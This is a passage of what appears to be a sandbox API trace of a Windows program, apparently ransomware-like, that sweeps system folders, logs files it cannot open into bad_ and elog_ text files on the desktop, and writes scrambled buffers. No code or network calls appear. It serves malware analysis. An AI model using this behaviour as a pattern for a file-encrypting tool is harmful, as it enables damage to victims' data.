Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Portable Devices\\regulations_consensus_score.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.UIF.xml.new\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.DIAGNOSTICS.xml.new\". Access is denied\r\n\x87\x92/¯¤N\x8e÷¹÷\x862\x1f¼v\x10ùÔUÓc_\x10§eðK}MÚh~úÀ\x8a^[\x81\x89\x04¬×D(H=§ÛÞ\x1a\x83\x14\x1bu\x01\x0eÉ]r4\x1cÜîUNòFx}tu\x09N=Z­Þ¸'ö%ù®\x8a.±@à \x9bÉ\x8cC]À\x04Æ\x97Cl9\x89ßvÓX\n\x88ø…ËU\x90ÅÐ&d\x84¤¼³Z7)\x93CU\x8d¨S%lÇëñ¨'ô…\x0eÓ±\x017\x8a¼à@N=Td\x12$9UlP:¹q\x11Ǭ¶T½\"%%ú\x03\x06", lpUsedDefaultChar=0x0) returned 6521 [0221.973] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ed6ca8*, nNumberOfBytesToWrite=0x1979, lpNumberOfBytesWritten=0x63fe20, lpOverlapped=0x0 | out: lpBuffer=0x1ed6ca8*, lpNumberOfBytesWritten=0x63fe20*=0x1979, lpOverlapped=0x0) returned 1 [0242.828] CloseHandle (hObject=0x2c8) returned 1 [0257.074] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=356 / B=2 / T=2891", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0257.074] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=356 / B=2 / T=2891", cchWideChar=38, lpMultiByteStr=0x1fe5514, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][10]: G=356 / B=2 / T=2891", lpUsedDefaultChar=0x0) returned 38 [0257.074] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x63feb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x63feb4*=0x26, lpOverlapped=0x0) returned 1 [0258.299] Sleep (dwMilliseconds=0x5dc) [0260.939] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\bad_460F9943EA70F103.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\bad_460f9943ea70f103.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0262.004] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\n", cchWideChar=1148, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1148 [0262.005] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\n", cchWideChar=1148, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1148 [0262.005] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\n", cchWideChar=1148, lpMultiByteStr=0x38a7a28, cbMultiByte=1148, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\n\x83\x07KgÕç0.=ù¡\x07\x9d\x88à\x05\x1a\x02þ\x12\x18Í«\x19Ã|Åöfpe\x11\x1aß©+ø\x19\x0bÃ\x8dÆ\x97ýêØ\x9crª\x10C8ÿI\x8co\x98\x9e`Ukðæ·~\x1dº{*þ\rW\x19\x8cOh²\x06Md\x0cdÒøñÑ¥ÿðMÁݶúM\x8eÌÏ\x01αÊ\n[Þ\x87ö.¡\x9a|¾c\x04…)øc1PÝ\x0emÆsºìL.Úfd\x1eçóýesþ\x81§Á.è\x17oµ\x1a\x8eF»Y2ñNáÁ\rðâÄ°\x05Äܬ'Ûhn\x0bZ2Û´XÂ\x88ÞZVLOþ\x8eù;\"û)Vó½>W¡Íò$¶~\x9e\x04\x825\x8bè&Ï\x80Ó?ÝðÁË\\\x9eti\x08E¹÷ä`O%H8\x091;Y÷ü¥\x8d\x82\x1d=\x19Ôèk\x11\x93Ôk=\x9b\x06VE*\x18Á\x7ff\x88ÀU\x1c,ù9ê/\x9eT\x7fID3\x8cNp©ô7#}\x07î<è_o\x99Á@í²öÙî=\x0e\x05<ø¶\x1d¼höTt\x0cÈ\x84í\x08ÒÞvCÒè²JZø]Òæþ@Áv6V^\x9b\x09\x92÷Zàµ", lpUsedDefaultChar=0x0) returned 1148 [0262.005] WriteFile (in: hFile=0x2ac, lpBuffer=0x38a7a28*, nNumberOfBytesToWrite=0x47c, lpNumberOfBytesWritten=0x63fe20, lpOverlapped=0x0 | out: lpBuffer=0x38a7a28*, lpNumberOfBytesWritten=0x63fe20*=0x47c, lpOverlapped=0x0) returned 1 [0262.005] CloseHandle (hObject=0x2ac) returned 1 [0262.879] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\elog_460F9943EA70F103.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\elog_460f9943ea70f103.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0265.702] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". A", cchWideChar=10165, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10165 [0265.702] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". A", cchWideChar=10165, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10165 [0265.702] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is 